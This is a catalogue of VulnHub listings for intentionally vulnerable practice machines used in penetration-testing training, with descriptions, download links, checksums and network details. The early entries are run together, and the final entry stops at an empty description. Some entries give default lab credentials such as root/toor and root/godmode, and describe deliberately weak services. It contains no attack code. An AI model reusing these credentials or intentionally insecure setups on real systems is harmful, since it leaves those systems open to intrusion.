Bot Challenges: Dexter25 Mar 2014bwallBot Challenges512 MBhttps://download.vulnhub.com/botchallenges/MurderingDexter.zipIn general, I’ve found that information is much easier to retain if it can be applied in the real world. Not everyone is a self-proclaimed botnet hunter, and it is not suggested (or recommended) that anyone try to exploit live botnets. For these reasons, I have put together another vulnerable virtual machine, which allows for aspiring botnet hunters and security enthusiasts to try their hand at attacking a Dexter command and control panel. It can be downloadedFBB7386A5B7562C88B6DB16DA95B9B4CCB63ECF589BB3BA1C18C015F02E36A84B62A2E7AVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
The Infernal: Hades (v1.0.1)9 Jun 2014Lok_SigmaThe Infernal435 MBhttps://download.vulnhub.com/infernal/Hades_v1.0.1.7zInfernal: Hades v1.0.1.Hades is a new boot2root challenge pitched at the advanced hobbyist. Solving this challenge will require skills in reverse engineering, sploit development and sound computer architecture understanding. If you’ve never heard of an opaque predicate, you’re going to have a hard time of it! I strongly suggest you don’t start this the week before exams, important meetings, deadlines of any sort, marriages, etc. The aim of this challenge is for you to incrementally increase your access to the box until you can escalate to root. The /root/flag.txt contains, amongst other things, a public PGP key which you can use to demonstrate victory - the private key has been given to the VulnHub.com admins. Enjoy, Lok_Sigma By using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software. Exclusive to VulnHub!Blog post: http://blog.vulnhub.com/2014/04/competition-hades.htmlv1 = 08/04/2014v1.0.1 = 09/06/2014B30D98E093E6ACCDECCF0553BF085C893D6D901813B8A5871EEFF3EB83F39ADD241DAF34Virtual Machine (VMware)LinuxEnabledAutomatically assign
Brainpan: 220 Nov 2013superkojimanBrainpan403 MBhttps://download.vulnhub.com/brainpan/brainpan2.zipBy using this virtual machine, you agree that in no event will I be liable for any loss or damage including without limitation, indirect or consequential loss or damage, or any loss or damage whatsoever arising from loss of data or profits arising out of or in connection with the use of this software.TL;DR: If something bad happens, it’s not my fault. Brainpan has been tested and found to work on the following hypervisors: - VMware Player 6.0.1 - VMWare Fusion 6.0.2 - VirtualBox 4.3.2 Check to make sure brainpan2.ova has following checksums so you know your download is intact: MD5: bf01f03ea0e7cea2553f74189ff35161 SHA1: b46891cda684246832f4dbc80ec6e40a997af65a Import brainpan2.ova into your preferred hypervisor and configure the network settings to your needs. It will get an IP address via DHCP, but it’s recommended you run it within a NAT or visible to the host OS only since it is vulnerable to attacks.Exclusive to VulnHub!Blog post: http://blog.vulnhub.com/2013/11/competition-brainpan-2.html55954FCA220801EA90CFB134DDE81E279CCD84837E7041594B21AA4DC7D981F5EF3AD248Virtual Machine (VMware)LinuxEnabledAutomatically assign
Exploit KB Vulnerable Web App: 128 Jan 2013ShaiExploit KB Vulnerable Web App212 MBhttps://download.vulnhub.com/exploitkb/exploit-wa-vm.7zDuring my SQL Injection learning journey I needed a vulnerable web application for practice.[I created a WebApp vulnerable to SQL Injection for my personal use. The result was an extremely vulnerable web site which I could test some SQLi techniques against MySQL. I must confess, I am not a programmer and I have never coded in PHP before, I thought it would be a good practice to develop a PHP based site from scratch in order to learn the basics of PHP and MySQL. exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques and it is a fully functional web site with a content management system based on fckeditor. I thought some of you may find it useful so I decided to share it via a SourceForge project page I created for it at : https://sourceforge.net/projects/exploitcoilvuln Please notice! this web app is extremely vulnerable to SQLi attack and it is poorly coded and configured intentionally. It is not recommended to use this WebApp as a live site on the net nor set it up on your local machine with access to it from the web. Please use it in your internal LAN only, Set it up in a virtual environment such as VMware or Virtual Box. This is a fully functional web site with a content management system based on fckeditor. I hope you will find this web app useful in your SQLi and web app security studies or demonstrations. 
Visit the Vulnerable Web Site by browsing to its IP address Admin interface can be found at: http://localhost/admin Username: admin Password: Database Name: exploit Database contains 8 tables: articles authors category downloads links members news videos I have only tested the web app for SQLi, but I am sure you will find some more interesting vulnerabilities Please try to avoid using automated tools to find the vulnerabilities and try doing it manually Feel free to discuss this web app by visiting http://exploit.co.il and commenting on the relevant post. You can send solutions, videos and ideas to shaiat]exploit.co.il and I will post them on my blog. Good Luck! Source:22FE5240E8C0347F7DF02828FC8636B587724AE4E514A2A6286C02502B54E58F04E30659Virtual Machine (VMware)LinuxEnabledAutomatically assign
VulnImage: 122 Dec 2010Lars BaumgaertnerVulnImage350 MBhttps://download.vulnhub.com/vulnimage/vulnimage.zip“Created for Lars’s students”Source:8CB0E628AEB3C7E1F771764D072806553739B679A7D469F455A7412F61ACAF22EF175D99Virtual Machine (VMware)LinuxEnabledAutomatically assign
Vicnum: 1.430 Dec 2009Mordecai KrausharVicnum448 MBhttps://download.vulnhub.com/vicnum/VMvicnum14.zipA flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’.Source:114D09578674DA13C1CA396AE534BD33BC36B166CC3D2E53C0F93A6CE075207153301999Virtual Machine (VMware)LinuxEnabledAutomatically assign
HackLAB: VulnVoIP31 Oct 2012Reboot UserHackLAB553 MBhttps://download.vulnhub.com/hacklab/vulnVoIP.7zVulnVoIP is based on a relatively old AsteriskNOW distribution and has a number of weaknesses. The aim is to locate VoIP users, crack their passwords and gain access to the Support account voicemail.Just to keep things interesting this particular distro also suffers from a known exploit from which it is relatively easy to gain a root shell. Once you’ve found the easy way, can you get root using a different method? I’ve created these basic VoIP hacking training exercises as I found very limited resources online. Hopefully VulnVoIP will help others learn the basic fundamentals of VoIP hacking in a safe environment. Source:1411BC06403307D5CA2ECAE47181972ADBF4A51899EF94A744B4FB47FDA902430BC5F5E5Virtual Machine (VMware)LinuxEnabledAutomatically assign
HackLAB: Vulnix10 Sep 2012Reboot UserHackLAB195 MBhttps://download.vulnhub.com/hacklab/Vulnix.7zHere we have a vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions (well at the time of release anyway!)The host is based upon Ubuntu Server 12.04 and is fully patched as of early September 2012. The details are as follows: The goal; boot up, find the IP, hack away and obtain the trophy hidden away in /root by any means you wish – excluding the actual hacking of the vmdk Feel free to contact me with any questions/comments using the comments section below. Enjoy! Source:0BF19D11836F72D22F30BF52CD5857573A4C3E9599FFBACE23387B368184E23E1F10F65CVirtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
/dev/random: scream10 Nov 2012Sagi-/dev/random156 MBhttps://download.vulnhub.com/devrandom/scream.exeSource: readme.nfoVulnInjector requires .NET framework version 4 or higher to be installed.Exclusive to VulnHub!Please see https://github.com/g0tmi1k/VulnInjector (You will need to generate your own ISO from the EXE).55170BC0410741BFCC374ABD7B8D3DC18FFAF13758C6449024AA86DA1E2B7E7F1986865BDisk Image (.ISO)WindowsEnabledAutomatically assign
OWASP Broken Web Applications Project: 1.23 Aug 2015OWASPOWASP Broken Web Applications Project1.7 GBhttps://download.vulnhub.com/owaspbwa/OWASP_Broken_Web_Apps_VM_1.2.7zThe Broken Web Applications (BWA) Project produces a Virtual Machine running a variety of applications with known vulnerabilities for those interested in:all the while saving people interested in doing either learning or testing the pain of having to compile, configure, and catalog all of the things normally involved in doing this process from scratch. Source: Release notes for the Open Web Application Security Project (OWASP) Broken Web Applications Project, a collection of vulnerable web applications that is distributed on a Virtual Machine in VMware format compatible with their no-cost and commercial VMware products. More information about the project can be found at http://www.owaspbwa.org/. The VM can be downloaded as a .zip file or as a much smaller .7z 7-zip Archive. BOTH FILES CONTAIN THE EXACT SAME VM! We recommend that you download the .7z archive if possible to save bandwidth (and time). 7-zip is available for Windows, Mac, Linux, and other Operating Systems. !!! This VM has many serious security issues. We strongly recommend that you run it only on the “host only” or “NAT” network in the virtual machine settings !!! Version 1.2 - 2015-08-03 Version 1.2rc1 - 2015-06-24 Version 1.1.1 - 2013-09-27 Version 1.1 - 2013-07-30 Version 1.1beta1 - 2013-07-10 Version 1.0 - 2012-07-24 Version 1.0rc2 - 2012-07-14 Version 1.0rc1 - 2012-04-04 Version 0.94 - 2011-07-24 Version 0.94rc3 - 2011-07-14 Version 0.94rc2 - 2011-07-13 Version 0.94rc1 - 2011-07-11 Version 0.93rc1 - 2011-01-19 Version 0.92rc2 - 2010-11-15 Version 0.92rc1 - 2010-11-10 Version 0.91rc1 - 2010-03-24 Version 0.9 - 2009-11-115FF063FE3D01887DAB49A5903C27C8FE6EBA081CBB54FE5804C8B2BD4B17AC9A053E4153Virtual Machine (Virtualbox - VDI)LinuxEnabledAutomatically assign
Damn Vulnerable Web Application (DVWA): 1.0.72 Oct 2011RandomStormDamn Vulnerable Web Application (DVWA)480 MBhttps://download.vulnhub.com/dvwa/DVWA-1.0.7.isoDamn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable.Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment. Source:9484D8E2154D4E01FBD742CD7C10AFFDE190DE8F6BC61D6596F21A8A6A9DA9E19DA3C0BFDisk Image (.ISO)LinuxEnabledAutomatically assign
Badstore: 1.2.324 Feb 2004BadstoreBadstore4.6 MBhttps://download.vulnhub.com/badstore/BadStore_123s.isoWelcome to Badstore.net Badstore.net is dedicated to helping you understand how hackers prey on Web application vulnerabilities, and to showing you how to reduce your exposure. Our Badstore demonstration software is designed to show you common hacking techniques. Source: v1.0 – Original version for 2004 RSA Show v1.1 – Added: v1.2 – Version presented at CSI 2004 Added: Source: BadStore_Manual.pdfB0F3BA0C4BF1EC0D82170B0552E25B7E6861B9DF1919D69EA198B1BEB509005D830890A8Disk Image (.ISO)LinuxEnabledAutomatically assign
Bobby: 17 Dec 2011TheXeroBobby5 MBhttps://download.vulnhub.com/bobby/bobby.exeSource: readme.txtExclusive to VulnHub!You will need to use your own Windows XP .ISO to create the target in order to attack. You can use any version of Windows to generate the image, but you need to supply it a valid Windows XP CD during the creation stage.Please see https://blog.vulnhub.com/introducing-vulninjector/ for more information.VulnInjector requires .NET framework version 4 or higher to be installed.C3F02A6ADAED5AC4DF906F3269700F5448E50E9173E26A6D2AD9A76FFD5D1FA344D23E68Disk Image (.ISO)WindowsDisabled192.168.1.11
Vicnum: 1.318 Oct 2009Mordecai KrausharVicnum303 MBhttps://download.vulnhub.com/vicnum/VMvicnum13.zipA flexible web app showing vulnerabilities such as cross site scripting, sql injections, and session management issues. Helpful to IT auditors honing web security skills and setting up ‘capture the flag’.Source: Note: ‘Bad virtual machine file’. You’ll need to create a new virtual machine & attach the existing hard driveDB4E6598ECC978BCF5DE0DE48A1B1FA00C03C9BCEEA57D86205881DC30781380485E9F19Virtual Machine (VMware)LinuxEnabledAutomatically assign
GoatseLinux: 1
Date released: 27 Jun 2009
Author: neutronstar
Series: GoatseLinux
Size: 555 MB
Download: https://download.vulnhub.com/goatselinux/GoatseLinux_1.0_VM.rar
Description:
GoatseLinux v1.0 pentest lab Virtual Machine
Steve Pordon 2009.06.27
Feel free to distribute this far and wide under the gnu license. This is specifically built for VMware 6.5 compatibility.
WARNING: GoatseLinux is intentionally unsecure. It was designed as a laboratory box to practice penetration testing on. Due to the wide open nature of nearly every program installed on it, I would strongly advise against setting your VM network to anything other than “host-based,” unless you enjoy your VMs being used as zombie spamboxes.
Notes: Built on the Slax 5.0.7 distro.
Source: readme.txt
MD5: 00E4240F1440105DD14FF2F5F03AAE82
SHA1: E07D183622DC8BF8694B545C92D7F00550DED88A
Format: Virtual Machine (Virtualbox - VDI)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Rattus: Loophole
Date released: 10 Apr 2011
Author: Rattus
Series: Rattus
Size: 436 MB
Download: https://download.vulnhub.com/rattus/Loophole.iso
Description:
Hi everyone! Recently I’ve created my own Live CD and would like to get some feedback from you. This Live CD, codename Loophole, is meant to show you how important it is to keep your software up to date and properly configured. There’s more than one way into the system and each one of them will teach you different network/computer security related topics.
We suspect that someone inside Rattus labs is working with a known terrorist group. Your mission is to infiltrate their computer network and obtain an encrypted document from one of their servers. Our inside source has told us that the document is saved under the name of Private.doc.enc and is encrypted using the OpenSSL encryption utility. Obtain the document and decrypt it to complete the mission.
Source:
MD5: F883D42170442E50E5310D16BE5A62B9
SHA1: 84D356F7DEBA7280F674F81D2DD3B02EA3A52A0D
Format: Disk Image (.ISO)
Operating system: Linux
DHCP service: Disabled
IP address: 10.8.7.2

Lab In A Box: 1
Date released: 3 Jun 2012
Author: PenTest Laboratory
Series: Lab In A Box
Size: 2.4 GB
Download: https://download.vulnhub.com/labinabox/laboratory_BT5r2-PTEv1.7z
Description:
The BackTrack Linux 5r2-PenTesting Edition lab is an all-in-one penetration testing lab environment that includes all of the hosts, network infrastructure, tools, and targets necessary to practice penetration testing. It includes:
This lab has some of the most popular penetration testing tools pre-installed and a number of vulnerabilities to discover and exploit. This all-in-one solution is the easiest and fastest method of building a full penetration testing lab environment for practicing your skills!
Source:
MD5: 3D6CA80B7E6AB74CF5EB31B92852FB2D
SHA1: 218A5A6E579330128D16A64D10A74B976E37F21C
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

UltimateLAMP: 0.2
Date released: 15 May 2006
Author: ARABX Pty Ltd
Series: UltimateLAMP
Size: 860 MB
Download: https://download.vulnhub.com/ultimatelamp/UltimateLAMP-0.2.zip
Description:
UltimateLAMP includes a long list of popular LAMP stack applications. For more information take a look at the UltimateLAMP products list. With the success of this first product, research has already commenced in our next two products UltimateLAMJ (Open Source Java Based Applications) and UltimateLAMR (Open Source Ruby Applications).
Source:
MD5: 3C4BA8CF727B8021925F20AE42F4D7AE
SHA1: CD0AA1783E3A63D9BEAFC67E68BB63A1DF6E4F9A
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

pWnOS: 1.0
Date released: 27 Jun 2008
Author: pWnOS
Series: pWnOS
Size: 432 MB
Download: https://download.vulnhub.com/pwnos/pWnOS_v1.0.zip
Description:
Some of you may have noticed this new pWnOS forum section. I created pWnOS as a virtual machine and Grendel was nice enough to let me post about it here. Here’s a bit of information on pWnOS. It’s a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t. 😃 Currently, the virtual machine NIC is configured in bridged networking, so it will obtain a normal IP address on the network you are connected to. You can easily change this to NAT or Host Only if you desire. A quick ping sweep will show the IP address of the virtual machine. Sorry…no scenario/storyline with this one. I wasn’t really planning to release it like this, so maybe for version 2.0 I’ll be more creative. 😃 I’m anxious to get feedback so let me know how it goes or if you have questions. Thanks and good luck!
Source:
Thanks for trying pWnOS 1.0. A few things to note before getting started. pWnOS is made using VMware Workstation and can be started by downloading VMware Server or VMware Player…both of which are free! Or VMware Workstation (Windows) or VMware Fusion (OS X), which are not free. I would rate the difficulty of pWnOS approximately the same as De-Ice’s level 2 disk…maybe a bit more difficult. See http://www.de-ice.net for information on the De-Ice penetration testing disks. I hope you enjoy it! If you have any questions or feedback, email me at bond00(at)gmail.com
bond00
Source: pWnOS_v1.0.zip/pWnOS readme.txt
MD5: 2C9DE33D0AA852F3B2E2E7D90C5F5C0E
SHA1: 7924910A3E5C9A69053484D998BD6729AFF3757B
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Kioptrix: Level 1.3 (#4)
Date released: 8 Feb 2012
Author: Kioptrix
Series: Kioptrix
Size: 210 MB
Download: https://download.vulnhub.com/kioptrix/Kioptrix4_Hyper_v.rar
Description:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that: [ Edit: sorry not what I meant ] 1a. It’s possible to remotely compromise the machine
I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post. Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start. I would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course.
– A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the image to suit your fusion version.
– Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve tested the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com
Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions. Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys. So I hope you enjoy this one.
The Kioptrix Team
Source:
Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive.
MD5: 1CBF24D1CA5BCB6651FE64EEE651928F
SHA1: 0A309696CD2F591DBEA36F295B538EA6322775CF
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

pWnOS: 2.0 (Pre-Release)
Date released: 4 Jul 2011
Author: pWnOS
Series: pWnOS
Size: 286 MB
Download: https://download.vulnhub.com/pwnos/pWnOS_v2.0.7z
Description:
pWnOS v2.0 (PRE-RELEASE!)
pWnOS v2.0 is a Virtual Machine Image which hosts a server to practice penetration testing. It will test your ability to exploit the server and contains multiple entry points to reach the goal (root). It was designed to be used with VMware Workstation 7.0, but can also be used with most other virtual machine software. For example the ip of with the netmask of is what I statically set my BackTrack 5 network adapter to. You may need to change VMware’s Network Adapter to NAT or Host-Only depending on your setup. The server’s ip is statically set to
v2.0 - 07/04/2011 - Pre-Release copy for initial testing
Source: pWnOS_v2.0.7z/pWnOS v2.0/pWnOS_INFO-v2_0.txt
MD5: 1EB0960C0BA29335230ADA1DF80CD22C
SHA1: A3FDBE0449363D1CB844D865FE7BD6EE8968567D
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Disabled
IP address: 10.10.10.100

Exploit-Exercises: Nebula (v5)
Date released: 5 Dec 2011
Author: Exploit-Exercises.com
Series: Exploit-Exercises
Size: 451 MB
Download: https://download.vulnhub.com/exploitexercises/exploit-exercises-nebula-5.iso
Description:
Nebula takes the participant through a variety of common (and less than common) weaknesses and vulnerabilities in Linux. It takes a look at
+ SUID files
+ Permissions
+ Race conditions
+ Shell meta-variables
+ $PATH weaknesses
+ Scripting language weaknesses
+ Binary compilation failures
At the end of Nebula, the user will have a reasonably thorough understanding of local attacks against Linux systems, and a cursory look at some of the remote attacks that are possible.
Have a look at the levels available on the side bar, and log into the virtual machine as the username “levelXX” with a password of “levelXX” (without quotes), where XX is the level number. Some levels can be done purely remotely. In case you need root access to change stuff (such as key mappings, etc), you can do the following: Log in as the “nebula” user account with the password “nebula” (both without quotes), followed by “sudo -s” with the password “nebula”. You’ll then have root privileges in order to change whatever needs to be changed.
Source:
From v4 to v5 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.
MD5: 276DAA8E00499E9C2D8AF7B15E4ACC3D
SHA1: E82F807BE06100BF3E048F82E899FB1FECC24E3A
Format: Disk Image (.ISO)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Metasploitable: 2
Date released: 12 Jun 2012
Author: Metasploit
Series: Metasploitable
Size: 833 MB
Download: https://download.vulnhub.com/metasploitable/metasploitable-linux-2.0.0.zip
Description:
Some folks may already be aware of Metasploitable, an intentionally vulnerable virtual machine designed for training, exploit testing, and general target practice. Unlike other vulnerable virtual machines, Metasploitable focuses on vulnerabilities at the operating system and network services layer instead of custom, vulnerable applications. I am happy to announce the release of Metasploitable 2, an even better punching bag for security tools like Metasploit, and a great way to practice exploiting vulnerabilities that you might find in a production environment. For download links and a walkthrough of some of the vulnerabilities (and how to exploit them), please take a look at the Metasploitable 2 Exploitability Guide. Have fun!
Source:
The VulnHub mirror has had a few edits done to the original - allowing for more VMware features.
MD5: 8825F2509A9B9A58EC66BD65EF83167F
SHA1: 84133002EF79FC191E726D41265CF5AB0DFAD2F0
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Moth: 0.6
Date released: 5 May 2009
Author: Andresriancho
Series: Moth
Size: 397 MB
Download: https://download.vulnhub.com/moth/moth-v0.6.7z
Description:
Moth is a downloadable VMWare image based on Ubuntu. It was set up to test the functionality of w3af and it includes various web application vulnerabilities. Most howto’s use Moth as an example for a web page under test.
Source:
Moth is a VMware image with a set of vulnerable Web Applications and scripts, that you may use for:
- Testing Web Application Security Scanners
- Testing Static Code Analysis tools (SCA)
- Giving an introductory course to Web Application Security
The motivation for creating this tool came after reading “anantasec-report.pdf” which is included in the release file which you are free to download. The main objective of this tool is to give the community a ready to use testbed for web application security tools. For almost every web application vulnerability that exists in the wild, there is a test script available in moth. There are three different ways to access the web applications and vulnerable scripts included in moth:
- Directly
- Through mod_security
- Through PHP-IDS (only if the web application is written in PHP)
Both mod_security and PHP-IDS have their default configurations and they show a log of the offending request when one is found. This is very useful for testing web application scanners, and teaching students how web application firewalls work. The beauty is that a user may access the same vulnerable script using the three methods; which helps a lot in the learning process.
Source: http://www.bonsai-sec.com/en/research/moth.php
MD5: 15BA966590D9D09D7FFE0950B9D4404D
SHA1: CEAFCFCA50E9DF0627B70CD4389B2F0136E2E947
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Metasploitable: 1
Date released: 19 May 2010
Author: Metasploit
Series: Metasploitable
Size: 545 MB
Download: https://download.vulnhub.com/metasploitable/Metasploitable.zip
Description:
One of the questions that we often hear is “What systems can I use to test against?” Based on this, we thought it would be a good idea to throw together an exploitable VM that you can use for testing purposes. Metasploitable is an Ubuntu 8.04 server install on a VMWare 6.5 image. A number of vulnerable packages are included, including an install of tomcat 5.5 (with weak credentials), distcc, tikiwiki, twiki, and an older mysql. You can use most VMware products to run it, and you’ll want to make sure it’s configured for Host-only networking unless it’s in your lab - no need to throw another vulnerable machine on the corporate network. It’s configured in non-persistent-disk mode, so you can simply reset it if you accidentally ‘rm -rf’ it.
Source:
MD5: E54089BA72FE0127D06528DECAD9A6AE
SHA1: 1F6698611068FAD4D9661C336B5D888A0A880FE9
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

The Hacker Games: 1
Date released: 4 Apr 2012
Author: Script Junkie
Series: The Hacker Games
Size: 75 MB
Download: https://download.vulnhub.com/thehackergames/scriptjunkie-Hacker-Games-Evil-VM-0e98c9c.zip
Description:
Welcome, welcome! The time has come to select one courageous young hacker for the honor of representing District 12 in the 74th annual Hacker Games! And congratulations, for you have been selected as tribute!
Hacking games and CTF’s are a lot of fun; who doesn’t like pitting your skills against the gamemakers and having a free pass to break into things? But watch out, as you will find out, some games are more dangerous than others. I have talked about counterattacks here before, and this system has implemented a number of aggressive anti-hacker measures. In fact, this VM is downright evil. I am probably legally obligated to tell you that . So if a calculator or message declaring your pwnedness pops up or shows up on your desktop, you asked for it. But don’t worry, it won’t steal your docs or rm you, it will just demonstrate compromise for the game.
To save precious bandwidth, this has been implemented in a minimal tinycore-based VM, and will require VirtualBox to run. But vbox is free – you can download it here: https://www.virtualbox.org/wiki/Downloads
Unfortunately, I didn’t have the time to add nearly all the things I wanted to, so there are really just a few challenges, a couple of counterhacks, and about 10 memes to conquer. Depending on your skill level, you could pwn (or be pwned) in just a few minutes or in a few hours. So hack it before it hacks you! No sponsors are necessary, so don’t light yourself on fire. Simply download the evil VM here: TheHackerGames.zip, start it, and open up http://localhost:3000/ to begin. Now, you can totally cheat since you own the VM, but see if you can beat the challenges without cheating. Then you can go ahead and cheat, which should also be fun – you’re probably comfortable with many physical access attacks involving the hard disk, but this system doesn’t use a hard disk.
So enjoy and remember… May the odds be ever in your favor!
Source:
MD5: 5EC6F47BCCFE226AE002B0587FE140EE
SHA1: 1F077500891B8C31BCFF95DB4A9F7ED70A638225
Format: Virtual Machine (Virtualbox - VDI)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Exploit-Exercises: Protostar (v2)
Date released: 26 Nov 2011
Author: Exploit-Exercises.com
Series: Exploit-Exercises
Size: 274 MB
Download: https://download.vulnhub.com/exploitexercises/exploit-exercises-protostar-2.iso
Description:
Protostar introduces the following in a friendly way:
In order to make this as easy as possible to introduce, Address Space Layout Randomisation and Non-Executable memory has been disabled. Once the virtual machine has booted, you are able to log in as the “user” account with the password “user” (without the quotes). The levels to be exploited can be found in the /opt/protostar/bin directory. For debugging the final levels, you can log in as root with password “godmode” (without the quotes). The /proc/sys/kernel/core_pattern is set to /tmp/core.%s.%e.%p. This means that instead of the general ./core file you get, it will be in a different directory and different file name.
Source:
From v1 to v2 - Moved from OVA to bootable CD format. Reduces issues with importing OVA files.
MD5: A4FEADEDF638744BE97DE7D2F3E06CE8
SHA1: D030796B11E9251F34EE448A95272A4D432CF2CE
Format: Disk Image (.ISO)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

De-ICE: S2.100
Date released: 16 Jan 2008
Author: De-ICE
Series: De-ICE
Size: 254 MB
Download: https://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.iso
Description:
The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency of previous (or current) staff
PenTest Lab Disk 2.100: This LiveCD is configured with an IP address of - no additional configuration is necessary. Your second system will use the BackTrack (v.2) LiveCD as provided by remote-exploit.org. A copy of the LiveCD can be downloaded from remote-exploit.org. This disk is configured to obtain an IP address through DHCP - thus no additional configuration is required. All tools necessary to exploit Disk 2.100 can be found on the BackTrack Disk. No additional installations will be necessary. The PenTest Lab system and the PenTest machine must connect to a router that has been configured with the following values:
LAN TCP/IP:
+ IP Address:
+ IP Subnet Mask:
Source:
Disk 2.100 version 1.1: http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso
http://heorot.net/instruction/tutorials/iso/iso_hashes
http://remote-exploit.org/backtrack_download.html
Warning: BackTrack v. 3 beta is known to NOT work. Please use version 2.
Network configuration: 192.168.2.xxx = http://forums.heorot.net/viewtopic.php?f=18&t=91
Source:
Original filename: de-ice-2.100-1.0.iso
Also known as ‘De-ICE Level 2 - Disk 1’
MD5: 09798F85BF54A666FBAB947300F38163
SHA1: B30A2CAD38EB0923DEBDA26498178E46601EFD6E
Format: Disk Image (.ISO)
Operating system: Linux
DHCP service: Disabled
IP address: 192.168.2.100

Kioptrix: Level 1 (#1)
Date released: 17 Feb 2010
Author: Kioptrix
Series: Kioptrix
Size: 186 MB
Download: https://download.vulnhub.com/kioptrix/Kioptrix_Level_1.rar
Description:
The Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.
Source:
Source:
MD5: 6DF1A7DFA555A220054FB98BA87FACD4
SHA1: 98CA3F4C079254E6B272265608E7D22119350A37
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Hackademic: RTB2
Date released: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
Size: 951 MB
Download: https://download.vulnhub.com/hackademic/Hackademic.RTB2.zip
Description:
This is the second realistic hackademic challenge (root this box) by mr.pr0n. Download the target and get root. After all, try to read the contents of the file ‘key.txt’ in the root directory. Enjoy!
Source:
MD5: 5F96E7BB53B47D9AFE17752F5ACA7E1F
SHA1: 5782DD334C4C8281A64EF79037864FAD67E5D173
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Hackademic: RTB1
Date released: 6 Sep 2011
Author: mr.pr0n
Series: Hackademic
Size: 838 MB
Download: https://download.vulnhub.com/hackademic/Hackademic.RTB1.zip
Description:
This is the first realistic hackademic challenge (root this box) by mr.pr0n. Download the target and get root. After all, try to read the contents of the file ‘key.txt’ in the root directory. Enjoy!
Source:
MD5: C972E899A8B5A745963BEF78FBCAEC6F
SHA1: E1D82E32D3A0353DA3C35AA91716B711907AC826
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

Drunk Admin Web Hacking Challenge: 1
Date released: 2 Apr 2012
Author: Bechtsoudis
Series: Drunk Admin Web Hacking Challenge
Size: 539 MB
Download: https://download.vulnhub.com/drunkadminhackingchallenge/drunk_admin_hacking_challenge.zip
Description:
The network is configured to obtain an IP address via DHCP by default. Although if you want to further configure the virtual machine you can login as user root and password toor. The apache web server is configured to run on port 8880.
The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the various web service features and find an exploitable vulnerability in order to read system hidden files. The web application is 100% custom so do not try to search google for relative PoC exploit code.
FINAL GOAL: Reveal the hidden message for a date arrangement that Bob sent to Alice.
Source:
MD5: EDF9BCD28049ED85312510D5872EA463
SHA1: 78AE803F76417D0531CAAE9210DB98426440EB15
Format: Virtual Machine (VMware)
Operating system: Linux
DHCP service: Enabled
IP address: Automatically assign

GameOver: 1
Date released: 14 Jun 2012
Author: Jovin Lobo
Series: GameOver
Size: 407 MB
Download: https://download.vulnhub.com/gameover/GameOver.0.1.null.iso
Description:
